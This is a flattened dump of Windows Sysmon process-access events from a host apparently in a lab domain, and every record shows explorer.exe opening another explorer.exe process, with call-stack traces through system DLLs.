16:54:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 